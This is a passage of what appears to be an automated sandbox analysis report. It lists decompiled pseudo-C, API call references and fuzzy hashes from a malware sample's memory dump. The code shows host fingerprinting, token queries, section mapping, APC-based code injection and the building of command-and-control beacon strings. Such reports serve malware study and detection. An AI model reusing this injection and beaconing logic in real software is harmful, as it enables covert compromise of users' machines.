                            					asm("cdq");
                            					_t53 = 9;
                            					_t61 = _t27 + (_v24.wMilliseconds & 0x0000ffff) % _t53;
                            					_t30 = E1000167E(__edi, _t61); // executed
                            					_v8 = _t30;
                            					Sleep(_t61 << 5); // executed
                            					_t31 = _v8;
                            				} while (_t31 == 0xc);
                            				if(_t31 != 0) {
                            					L21:
                            					return _t31;
                            				}
                            				_push(__edi);
                            				if(_a4 != 0) {
                            					L11:
                            					_t32 = CreateThread(0, 0, __imp__SleepEx,  *0x10004140, 0, 0); // executed
                            					_t64 = _t32;
                            					if(_t64 == 0) {
                            						L18:
                            						_v8 = GetLastError();
                            						L19:
                            						_t31 = _v8;
                            						if(_t31 == 0xffffffff) {
                            							_t31 = GetLastError();
                            						}
                            						goto L21;
                            					}
                            					_t35 = QueueUserAPC(E1000133E, _t64,  &_v48); // executed
                            					if(_t35 == 0) {
                            						_t40 = GetLastError();
                            						_a4 = _t40;
                            						TerminateThread(_t64, _t40);
                            						CloseHandle(_t64);
                            						_t64 = 0;
                            						SetLastError(_a4);
                            					}
                            					if(_t64 == 0) {
                            						goto L18;
                            					} else {
                            						_t36 = WaitForSingleObject(_t64, 0xffffffff);
                            						_v8 = _t36;
                            						if(_t36 == 0) {
                            							GetExitCodeThread(_t64,  &_v8);
                            						}
                            						CloseHandle(_t64);
                            						goto L19;
                            					}
                            				}
                            				if(E10001C6E(_t53,  &_a4) != 0) {
                            					 *0x10004138 = 0;
                            					goto L11;
                            				}
                            				_t65 = __imp__GetLongPathNameW;
                            				_t45 =  *_t65(_a4, 0, 0); // executed
                            				_t58 = _t45;
                            				if(_t58 == 0) {
                            					L9:
                            					 *0x10004138 = _a4;
                            					goto L11;
                            				}
                            				_t14 = _t58 + 2; // 0x2
                            				_t48 = E10001669(_t58 + _t14);
                            				 *0x10004138 = _t48;
                            				if(_t48 == 0) {
                            					goto L9;
                            				}
                            				 *_t65(_a4, _t48, _t58); // executed
                            				E10001E78(_a4);
                            				goto L11;
                            			}

                            APIs
                              • Part of subcall function 10001799: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,100019D3), ref: 100017A8
                              • Part of subcall function 10001799: GetVersion.KERNEL32(?,100019D3), ref: 100017B7
                              • Part of subcall function 10001799: GetCurrentProcessId.KERNEL32(?,100019D3), ref: 100017D3
                              • Part of subcall function 10001799: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,100019D3), ref: 100017EC
                            • GetSystemTime.KERNEL32(?), ref: 100019E5
                            • SwitchToThread.KERNEL32 ref: 100019EB
                              • Part of subcall function 1000167E: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000000,10001A05,?,00000000,?,?,?,?,?,?,?,10001A05), ref: 100016D4
                              • Part of subcall function 1000167E: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,10001A05,00000000), ref: 10001766
                              • Part of subcall function 1000167E: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,10001A05), ref: 10001781
                            • Sleep.KERNELBASE(00000000,00000000), ref: 10001A0C
                            • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 10001A40
                            • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 10001A60
                            • CreateThread.KERNEL32 ref: 10001A8C
                            • QueueUserAPC.KERNELBASE(1000133E,00000000,?), ref: 10001AA8
                            • GetLastError.KERNEL32 ref: 10001AB8
                            • TerminateThread.KERNEL32(00000000,00000000), ref: 10001ABF
                            • CloseHandle.KERNEL32(00000000), ref: 10001AC6
                            • SetLastError.KERNEL32(?), ref: 10001ACD
                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10001ADA
                            • GetExitCodeThread.KERNEL32(00000000,?), ref: 10001AEC
                            • CloseHandle.KERNEL32(00000000), ref: 10001AF3
                            • GetLastError.KERNEL32 ref: 10001AF7
                            • GetLastError.KERNEL32 ref: 10001B05
                            Memory Dump Source
                            • Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp
                            Similarity
                            • API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchSystemTerminateTimeUserVersionWaitmemcpy
                            • String ID:
                            • API String ID: 2478182988-0
                            • Opcode ID: fa1ee72ffcd87df28d4980db385e47b2fea2ca39d0f496df63b7363508c87dfc
                            • Instruction ID: 4aef50b4a7eb8dd860cd90a223b160882761c3e146f8e067f7313366ed264c2c
                            • Opcode Fuzzy Hash: fa1ee72ffcd87df28d4980db385e47b2fea2ca39d0f496df63b7363508c87dfc
                            • Instruction Fuzzy Hash: 143150B5902129BFF701EFB5CCC89DF7BACEB092D47118526F905D2158E7309E419BA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 96%
                            			E00CF5DC6(char __eax, void* __esi) {
                            				long _v8;
                            				char _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _v28;
                            				long _t34;
                            				signed int _t39;
                            				long _t50;
                            				char _t59;
                            				intOrPtr _t61;
                            				void* _t62;
                            				void* _t64;
                            				char _t65;
                            				intOrPtr* _t67;
                            				void* _t68;
                            				void* _t69;
                            
                            				_t69 = __esi;
                            				_t65 = __eax;
                            				_v8 = 0;
                            				_v12 = __eax;
                            				if(__eax == 0) {
                            					_t59 =  *0xcfd270; // 0xd448b889
                            					_v12 = _t59;
                            				}
                            				_t64 = _t69;
                            				E00CF60BE( &_v12, _t64);
                            				if(_t65 != 0) {
                            					 *_t69 =  *_t69 ^  *0xcfd2a0 ^ 0x4c0ca0ae;
                            				} else {
                            					GetUserNameW(0,  &_v8); // executed
                            					_t50 = _v8;
                            					if(_t50 != 0) {
                            						_t62 = RtlAllocateHeap( *0xcfd238, 0, _t50 + _t50);
                            						if(_t62 != 0) {
                            							if(GetUserNameW(_t62,  &_v8) != 0) {
                            								_t64 = _t62;
                            								 *_t69 =  *_t69 ^ E00CF4D95(_v8 + _v8, _t64);
                            							}
                            							HeapFree( *0xcfd238, 0, _t62);
                            						}
                            					}
                            				}
                            				_t61 = __imp__;
                            				_v8 = _v8 & 0x00000000;
                            				GetComputerNameW(0,  &_v8);
                            				_t34 = _v8;
                            				if(_t34 != 0) {
                            					_t68 = RtlAllocateHeap( *0xcfd238, 0, _t34 + _t34);
                            					if(_t68 != 0) {
                            						if(GetComputerNameW(_t68,  &_v8) != 0) {
                            							_t64 = _t68;
                            							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E00CF4D95(_v8 + _v8, _t64);
                            						}
                            						HeapFree( *0xcfd238, 0, _t68);
                            					}
                            				}
                            				asm("cpuid");
                            				_t67 =  &_v28;
                            				 *_t67 = 1;
                            				 *((intOrPtr*)(_t67 + 4)) = _t61;
                            				 *((intOrPtr*)(_t67 + 8)) = 0;
                            				 *(_t67 + 0xc) = _t64;
                            				_t39 = _v16 ^ _v20 ^ _v28;
                            				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                            				return _t39;
                            			}




















                            APIs
                            • GetUserNameW.ADVAPI32(00000000,?), ref: 00CF5DFD
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 00CF5E14
                            • GetUserNameW.ADVAPI32(00000000,?), ref: 00CF5E21
                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00CF5063), ref: 00CF5E42
                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00CF5E69
                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00CF5E7D
                            • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00CF5E8A
                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00CF5063), ref: 00CF5EA8
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: HeapName$AllocateComputerFreeUser
                            • String ID:
                            • API String ID: 3239747167-0
                            • Opcode ID: 5e33fbab79950be44532fe060b0916e19dd732b95547beb19aac35d6d3562d28
                            • Instruction ID: 31f7a3e76c3e761ba77cd6f1c4191d09ed1f56ce8b701c298ba1db20ce815920
                            • Opcode Fuzzy Hash: 5e33fbab79950be44532fe060b0916e19dd732b95547beb19aac35d6d3562d28
                            • Instruction Fuzzy Hash: 08310972A00609EFDB50DF69DD81BBEB7FAEB44300F214469E615D6220DB30DE01DB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 38%
                            			E00CF9932(char _a4, void* _a8) {
                            				void* _v8;
                            				void* _v12;
                            				char _v16;
                            				void* _v20;
                            				char _v24;
                            				char _v28;
                            				char _v32;
                            				char _v36;
                            				char _v40;
                            				void* _v44;
                            				void** _t33;
                            				void* _t40;
                            				void* _t43;
                            				void** _t44;
                            				intOrPtr* _t47;
                            				char _t48;
                            
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				_v20 = _a4;
                            				_t48 = 0;
                            				_v16 = 0;
                            				_a4 = 0;
                            				_v44 = 0x18;
                            				_v40 = 0;
                            				_v32 = 0;
                            				_v36 = 0;
                            				_v28 = 0;
                            				_v24 = 0;
                            				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                            					_t33 =  &_v8;
                            					__imp__(_v12, 8, _t33);
                            					if(_t33 >= 0) {
                            						_t47 = __imp__;
                            						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                            						_t44 = E00CF8D59(_a4);
                            						if(_t44 != 0) {
                            							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                            							if(_t40 >= 0) {
                            								memcpy(_a8,  *_t44, 0x1c);
                            								_t48 = 1;
                            							}
                            							E00CF677C(_t44);
                            						}
                            						NtClose(_v8); // executed
                            					}
                            					NtClose(_v12);
                            				}
                            				return _t48;
                            			}




















                            APIs
                            • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00CF9979
                            • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 00CF998C
                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00CF99A8
                              • Part of subcall function 00CF8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00CF9099), ref: 00CF8D65
                            • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00CF99C5
                            • memcpy.NTDLL(00000000,00000000,0000001C), ref: 00CF99D2
                            • NtClose.NTDLL(?), ref: 00CF99E4
                            • NtClose.NTDLL(00000000), ref: 00CF99EE
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                            • String ID:
                            • API String ID: 2575439697-0
                            • Opcode ID: 368b7b6ed647dcd4a6fa252757097b86962e9875197eece12966fd24e5c9f744
                            • Instruction ID: 2b4598a0fdb77e0e37798be4277914d2c18a3e85e4da1e1f52538698b03799ee
                            • Opcode Fuzzy Hash: 368b7b6ed647dcd4a6fa252757097b86962e9875197eece12966fd24e5c9f744
                            • Instruction Fuzzy Hash: 3F210771A0011CBBDF01AF95CD85AEEBFBDEF08740F104016F605E6160D7B18A54EBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 72%
                            			E10001DD0(intOrPtr* __eax, void** _a4) {
                            				int _v12;
                            				void* _v16;
                            				void* _v20;
                            				void* _v24;
                            				int _v28;
                            				int _v32;
                            				intOrPtr _v36;
                            				int _v40;
                            				int _v44;
                            				void* _v48;
                            				void* __esi;
                            				long _t34;
                            				void* _t39;
                            				void* _t47;
                            				intOrPtr* _t48;
                            
                            				_t48 = __eax;
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				_v24 =  *((intOrPtr*)(__eax + 4));
                            				_v16 = 0;
                            				_v12 = 0;
                            				_v48 = 0x18;
                            				_v44 = 0;
                            				_v36 = 0x40;
                            				_v40 = 0;
                            				_v32 = 0;
                            				_v28 = 0;
                            				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                            				if(_t34 < 0) {
                            					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                            				} else {
                            					 *_t48 = _v16;
                            					_t39 = E10001812(_t48,  &_v12); // executed
                            					_t47 = _t39;
                            					if(_t47 != 0) {
                            						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                            					} else {
                            						memset(_v12, 0, _v24);
                            						 *_a4 = _v12;
                            					}
                            				}
                            				return _t47;
                            			}



















                            APIs
                            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 10001E2D
                              • Part of subcall function 10001812: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,10001E42,00000002,00000000,?,?,00000000,?,?,10001E42,00000002), ref: 1000183F
                            • memset.NTDLL ref: 10001E4F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp
                            Similarity
                            • API ID: Section$CreateViewmemset
                            • String ID: @
                            • API String ID: 2533685722-2766056989
                            • Opcode ID: 6a036c25c3596289e1496aeb05bd05d7099d0fc69dd2c6ace39beb277248278c
                            • Instruction ID: a7ee5fb51198b84d194c3a9f3c529b392fcfabc5d3c13dd4e92119350f342c38
                            • Opcode Fuzzy Hash: 6a036c25c3596289e1496aeb05bd05d7099d0fc69dd2c6ace39beb277248278c
                            • Instruction Fuzzy Hash: 1C210BB6D00209AFDB11CFA9C8849DEFBB9EB48294F508429E605F7210D730AA448B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 68%
                            			E10001812(void** __esi, PVOID* _a4) {
                            				long _v8;
                            				void* _v12;
                            				void* _v16;
                            				long _t13;
                            
                            				_v16 = 0;
                            				asm("stosd");
                            				_v8 = 0;
                            				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                            				if(_t13 < 0) {
                            					_push(_t13);
                            					return __esi[6]();
                            				}
                            				return 0;
                            			}








                            APIs
                            • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,10001E42,00000002,00000000,?,?,00000000,?,?,10001E42,00000002), ref: 1000183F
                            Memory Dump Source
                            • Source File: 00000001.00000002.593901032.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000001.00000002.593964557.0000000010005000.00000040.00000001.sdmp
                            Similarity
                            • API ID: SectionView
                            • String ID:
                            • API String ID: 1323581903-0
                            • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                            • Instruction ID: 6d1e1847bffdb7ea578f335206b8a95dbb6c7942dd4018a96a037df7c49ea5ed
                            • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                            • Instruction Fuzzy Hash: 8BF030B690020DFFEB119FA5CC85CDFBBBDEB44394B108939F552E2095DA309E089B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 66%
                            			E00CF1D4C(long __eax, void* __ecx, void* __edx, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                            				intOrPtr _v0;
                            				intOrPtr _v4;
                            				intOrPtr _v20;
                            				intOrPtr _v28;
                            				intOrPtr _v32;
                            				void* _v48;
                            				intOrPtr _v56;
                            				void* __edi;
                            				long _t26;
                            				intOrPtr _t27;
                            				intOrPtr _t28;
                            				intOrPtr _t29;
                            				intOrPtr _t30;
                            				intOrPtr _t31;
                            				void* _t34;
                            				intOrPtr _t35;
                            				int _t38;
                            				void* _t39;
                            				intOrPtr _t43;
                            				intOrPtr _t44;
                            				intOrPtr _t51;
                            				intOrPtr _t55;
                            				intOrPtr* _t57;
                            				intOrPtr _t63;
                            				intOrPtr _t65;
                            				intOrPtr _t71;
                            				intOrPtr _t74;
                            				intOrPtr _t77;
                            				int _t80;
                            				intOrPtr _t81;
                            				int _t84;
                            				intOrPtr _t86;
                            				int _t89;
                            				intOrPtr* _t92;
                            				intOrPtr* _t93;
                            				void* _t94;
                            				void* _t98;
                            				void* _t99;
                            				void* _t100;
                            				intOrPtr _t101;
                            				void* _t103;
                            				int _t104;
                            				void* _t105;
                            				void* _t106;
                            				void* _t108;
                            				void* _t109;
                            				void* _t111;
                            
                            				_t98 = __edx;
                            				_t94 = __ecx;
                            				_t26 = __eax;
                            				_t108 = _a16;
                            				_v4 = 8;
                            				if(__eax == 0) {
                            					_t26 = GetTickCount();
                            				}
                            				_t27 =  *0xcfd018; // 0xd5dd08ab
                            				asm("bswap eax");
                            				_t28 =  *0xcfd014; // 0x3a87c8cd
                            				asm("bswap eax");
                            				_t29 =  *0xcfd010; // 0xd8d2f808
                            				asm("bswap eax");
                            				_t30 =  *0xcfd00c; // 0xeec43f25
                            				asm("bswap eax");
                            				_t31 =  *0xcfd2a4; // 0x247a5a8
                            				_t3 = _t31 + 0xcfe633; // 0x74666f73
                            				_t104 = wsprintfA(_t108, _t3, 2, 0x3d13b, _t30, _t29, _t28, _t27,  *0xcfd02c,  *0xcfd004, _t26);
                            				_t34 = E00CF6B47();
                            				_t35 =  *0xcfd2a4; // 0x247a5a8
                            				_t4 = _t35 + 0xcfe673; // 0x74707526
                            				_t38 = wsprintfA(_t104 + _t108, _t4, _t34);
                            				_t111 = _t109 + 0x38;
                            				_t105 = _t104 + _t38; // executed
                            				_t39 = E00CF6111(_t94); // executed
                            				_t99 = _t39;
                            				if(_t99 != 0) {
                            					_t86 =  *0xcfd2a4; // 0x247a5a8
                            					_t6 = _t86 + 0xcfe8eb; // 0x736e6426
                            					_t89 = wsprintfA(_t105 + _t108, _t6, _t99);
                            					_t111 = _t111 + 0xc;
                            					_t105 = _t105 + _t89;
                            					HeapFree( *0xcfd238, 0, _t99);
                            				}
                            				_t100 = E00CF26A0();
                            				if(_t100 != 0) {
                            					_t81 =  *0xcfd2a4; // 0x247a5a8
                            					_t8 = _t81 + 0xcfe8f3; // 0x6f687726
                            					_t84 = wsprintfA(_t105 + _t108, _t8, _t100);
                            					_t111 = _t111 + 0xc;
                            					_t105 = _t105 + _t84;
                            					HeapFree( *0xcfd238, 0, _t100);
                            				}
                            				_t101 =  *0xcfd324; // 0x31795b0
                            				_a32 = E00CF1B77(0xcfd00a, _t101 + 4);
                            				_t43 =  *0xcfd2cc; // 0x0
                            				if(_t43 != 0) {
                            					_t77 =  *0xcfd2a4; // 0x247a5a8
                            					_t11 = _t77 + 0xcfe8cd; // 0x3d736f26
                            					_t80 = wsprintfA(_t105 + _t108, _t11, _t43);
                            					_t111 = _t111 + 0xc;
                            					_t105 = _t105 + _t80;
                            				}
                            				_t44 =  *0xcfd2c8; // 0x0
                            				if(_t44 != 0) {
                            					_t74 =  *0xcfd2a4; // 0x247a5a8
                            					_t13 = _t74 + 0xcfe8c6; // 0x3d706926
                            					wsprintfA(_t105 + _t108, _t13, _t44);
                            				}
                            				if(_a32 != 0) {
                            					_t103 = RtlAllocateHeap( *0xcfd238, 0, 0x800);
                            					if(_t103 != 0) {
                            						E00CF1BE3(GetTickCount());
                            						_t51 =  *0xcfd324; // 0x31795b0
                            						__imp__(_t51 + 0x40);
                            						asm("lock xadd [eax], ecx");
                            						_t55 =  *0xcfd324; // 0x31795b0
                            						__imp__(_t55 + 0x40);
                            						_t57 =  *0xcfd324; // 0x31795b0
                            						_t106 = E00CF1A30(1, _t98, _t108,  *_t57);
                            						asm("lock xadd [eax], ecx");
                            						if(_t106 != 0) {
                            							StrTrimA(_t106, 0xcfc2a4);
                            							_t63 =  *0xcfd2a4; // 0x247a5a8
                            							_push(_t106);
                            							_t15 = _t63 + 0xcfe252; // 0x616d692f
                            							_t65 = E00CF2773(_t15);
                            							_v20 = _t65;
                            							if(_t65 != 0) {
                            								_t92 = __imp__;
                            								 *_t92(_t106, _v4);
                            								 *_t92(_t103, _v0);
                            								_t93 = __imp__;
                            								 *_t93(_t103, _v32);
                            								 *_t93(_t103, _t106);
                            								_t71 = E00CF32F0(0xffffffffffffffff, _t103, _v32, _v28); // executed
                            								_v56 = _t71;
                            								if(_t71 != 0 && _t71 != 0x10d2) {
                            									E00CF5BEA();
                            								}
                            								HeapFree( *0xcfd238, 0, _v48);
                            							}
                            							HeapFree( *0xcfd238, 0, _t106);
                            						}
                            						HeapFree( *0xcfd238, 0, _t103);
                            					}
                            					HeapFree( *0xcfd238, 0, _a24);
                            				}
                            				HeapFree( *0xcfd238, 0, _t108);
                            				return _a12;
                            			}

                            APIs
                            • GetTickCount.KERNEL32 ref: 00CF1D63
                            • wsprintfA.USER32 ref: 00CF1DB0
                            • wsprintfA.USER32 ref: 00CF1DCD
                            • wsprintfA.USER32 ref: 00CF1DF0
                            • HeapFree.KERNEL32(00000000,00000000), ref: 00CF1E00
                            • wsprintfA.USER32 ref: 00CF1E22
                            • HeapFree.KERNEL32(00000000,00000000), ref: 00CF1E32
                            • wsprintfA.USER32 ref: 00CF1E69
                            • wsprintfA.USER32 ref: 00CF1E89
                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00CF1EA6
                            • GetTickCount.KERNEL32 ref: 00CF1EB6
                            • RtlEnterCriticalSection.NTDLL(03179570), ref: 00CF1ECA
                            • RtlLeaveCriticalSection.NTDLL(03179570), ref: 00CF1EE8
                              • Part of subcall function 00CF1A30: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,00CF1EFB,?,031795B0), ref: 00CF1A5B
                              • Part of subcall function 00CF1A30: lstrlen.KERNEL32(?,?,?,00CF1EFB,?,031795B0), ref: 00CF1A63
                              • Part of subcall function 00CF1A30: strcpy.NTDLL ref: 00CF1A7A
                              • Part of subcall function 00CF1A30: lstrcat.KERNEL32(00000000,?), ref: 00CF1A85
                              • Part of subcall function 00CF1A30: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00CF1EFB,?,031795B0), ref: 00CF1AA2
                            • StrTrimA.SHLWAPI(00000000,00CFC2A4,?,031795B0), ref: 00CF1F1A
                              • Part of subcall function 00CF2773: lstrlen.KERNEL32(?,00000000,00000000,00CF1F32,616D692F,00000000), ref: 00CF277F
                              • Part of subcall function 00CF2773: lstrlen.KERNEL32(?), ref: 00CF2787
                              • Part of subcall function 00CF2773: lstrcpy.KERNEL32(00000000,?), ref: 00CF279E
                              • Part of subcall function 00CF2773: lstrcat.KERNEL32(00000000,?), ref: 00CF27A9
                            • lstrcpy.KERNEL32(00000000,?), ref: 00CF1F45
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00CF1F4C
                            • lstrcat.KERNEL32(00000000,?), ref: 00CF1F59
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00CF1F5D
                              • Part of subcall function 00CF32F0: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74B481D0), ref: 00CF33A2
                            • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00CF1F8D
                            • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 00CF1F9C
                            • HeapFree.KERNEL32(00000000,00000000,?,031795B0), ref: 00CF1FAB
                            • HeapFree.KERNEL32(00000000,00000000), ref: 00CF1FBD
                            • HeapFree.KERNEL32(00000000,?), ref: 00CF1FCC
                            Memory Dump Source
                            • Source File: 00000001.00000002.590618455.0000000000CF1000.00000020.00000001.sdmp, Offset: 00CF0000, based on PE: true
                            • Associated: 00000001.00000002.590606715.0000000000CF0000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590635246.0000000000CFC000.00000002.00000001.sdmp
                            • Associated: 00000001.00000002.590650801.0000000000CFD000.00000004.00000001.sdmp
                            • Associated: 00000001.00000002.590659587.0000000000CFF000.00000002.00000001.sdmp
                            Similarity
                            • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                            • String ID:
                            • API String ID: 3080378247-0
                            • Opcode ID: 2fc18b53d123d1ee5bda885ca3c53f49124ef6f186795366710876719e0fd1f2
                            • Instruction ID: e59de09fd9392ff907e5a7c9699ad4bdeed6e8961744b6f47bbabfe8b3aae21d
                            • Opcode Fuzzy Hash: 2fc18b53d123d1ee5bda885ca3c53f49124ef6f186795366710876719e0fd1f2
                            • Instruction Fuzzy Hash: C9616E71600209EFC711AB68ED88F7E77A9EB48350F160114FA0AD7271DB35E906DBA7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 74%
                            			E00CF12C4(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                            				void* _v8;
                            				signed int _v12;
                            				void* _v16;
                            				void* _v20;
                            				void* _v24;
                            				void* _v28;
                            				void* __ebx;
                            				void* __edi;
                            				long _t60;
                            				intOrPtr _t61;
                            				intOrPtr _t62;
                            				intOrPtr _t63;
                            				intOrPtr _t64;
                            				intOrPtr _t65;
                            				void* _t68;
                            				intOrPtr _t69;
                            				int _t72;
                            				void* _t73;
                            				void* _t74;
                            				void* _t76;
                            				void* _t79;
                            				intOrPtr _t83;
                            				intOrPtr _t87;
                            				intOrPtr* _t89;
                            				intOrPtr _t95;
                            				void* _t97;
                            				intOrPtr _t104;
                            				signed int _t108;
                            				char** _t110;
                            				int _t113;
                            				signed int _t115;
                            				intOrPtr* _t116;
                            				intOrPtr* _t118;
                            				intOrPtr* _t120;
                            				intOrPtr* _t122;
                            				intOrPtr _t125;
                            				intOrPtr _t130;
                            				int _t134;
                            				CHAR* _t136;
                            				intOrPtr _t137;
                            				void* _t138;
                            				void* _t147;
                            				int _t148;
                            				void* _t149;
                            				intOrPtr _t150;
                            				void* _t152;
                            				long _t156;
                            				intOrPtr* _t157;
                            				intOrPtr* _t158;
                            				intOrPtr* _t161;
                            				void* _t162;
                            				void* _t164;
                            
                            				_t147 = __edx;
                            				_t138 = __ecx;
                            				_t60 = __eax;
                            				_v12 = 8;
                            				if(__eax == 0) {
                            					_t60 = GetTickCount();
                            				}
                            				_t61 =  *0xcfd018; // 0xd5dd08ab
                            				asm("bswap eax");
                            				_t62 =  *0xcfd014; // 0x3a87c8cd
                            				_t136 = _a16;
                            				asm("bswap eax");
                            				_t63 =  *0xcfd010; // 0xd8d2f808
                            				asm("bswap eax");
                            				_t64 =  *0xcfd00c; // 0xeec43f25
                            				asm("bswap eax");
                            				_t65 =  *0xcfd2a4; // 0x247a5a8
                            				_t3 = _t65 + 0xcfe633; // 0x74666f73
                            				_t148 = wsprintfA(_t136, _t3, 3, 0x3d13b, _t64, _t63, _t62, _t61,  *0xcfd02c,  *0xcfd004, _t60);
                            				_t68 = E00CF6B47();
                            				_t69 =  *0xcfd2a4; // 0x247a5a8
                            				_t4 = _t69 + 0xcfe673; // 0x74707526
                            				_t72 = wsprintfA(_t148 + _t136, _t4, _t68);
                            				_t164 = _t162 + 0x38;
                            				_t149 = _t148 + _t72; // executed
                            				_t73 = E00CF6111(_t138); // executed
                            				_t137 = __imp__;
                            				_v8 = _t73;
                            				if(_t73 != 0) {
                            					_t130 =  *0xcfd2a4; // 0x247a5a8
                            					_t7 = _t130 + 0xcfe8eb; // 0x736e6426
                            					_t134 = wsprintfA(_a16 + _t149, _t7, _t73);
                            					_t164 = _t164 + 0xc;
                            					_t149 = _t149 + _t134;
                            					HeapFree( *0xcfd238, 0, _v8);
                            				}
                            				_t74 = E00CF26A0();
                            				_v8 = _t74;
                            				if(_t74 != 0) {
                            					_t125 =  *0xcfd2a4; // 0x247a5a8
                            					_t11 = _t125 + 0xcfe8f3; // 0x6f687726
                            					wsprintfA(_t149 + _a16, _t11, _t74);
                            					_t164 = _t164 + 0xc;
                            					HeapFree( *0xcfd238, 0, _v8);
                            				}
                            				_t150 =  *0xcfd324; // 0x31795b0
                            				_t76 = E00CF1B77(0xcfd00a, _t150 + 4);
                            				_t156 = 0;
                            				_v20 = _t76;
                            				if(_t76 == 0) {
                            					L26:
                            					RtlFreeHeap( *0xcfd238, _t156, _a16); // executed
                            					return _v12;
                            				} else {
                            					_t79 = RtlAllocateHeap( *0xcfd238, 0, 0x800);
                            					_v8 = _t79;
                            					if(_t79 == 0) {
                            						L25:
                            						HeapFree( *0xcfd238, _t156, _v20);
                            						goto L26;
                            					}
                            					E00CF1BE3(GetTickCount());
                            					_t83 =  *0xcfd324; // 0x31795b0
                            					__imp__(_t83 + 0x40);
                            					asm("lock xadd [eax], ecx");
                            					_t87 =  *0xcfd324; // 0x31795b0
                            					__imp__(_t87 + 0x40);
                            					_t89 =  *0xcfd324; // 0x31795b0
